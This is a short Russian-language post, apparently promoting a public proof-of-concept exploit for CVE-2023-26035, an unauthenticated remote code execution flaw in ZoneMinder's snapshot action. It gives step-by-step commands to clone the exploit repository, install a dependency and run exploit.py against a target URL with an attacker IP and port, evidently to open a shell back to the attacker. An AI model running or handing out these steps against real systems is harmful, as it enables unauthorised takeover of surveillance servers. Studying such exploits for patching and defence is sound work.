
Неаутентифицированное RCE в ZoneMinder Snapshots - PoC эксплойт
Неаутентифицированное RCE в ZoneMinder Snapshots — PoC-эксплойт
alt img
Версии ZoneMinder до 1.36.33 и 1.37.33 уязвимы для неаутентифицированного удалённого выполнения кода из-за отсутствия проверок авторизации в действии snapshot.
git clone https://github.com/rvizx/CVE-2023-26035
cd CVE-2023-26035
python3 exploit.py
python3 exploit.py -t <target_url> -ip <attacker-ip> -p <port>
pip3 install beautifulsoup4
Уязвимость обнаружил UnblvR.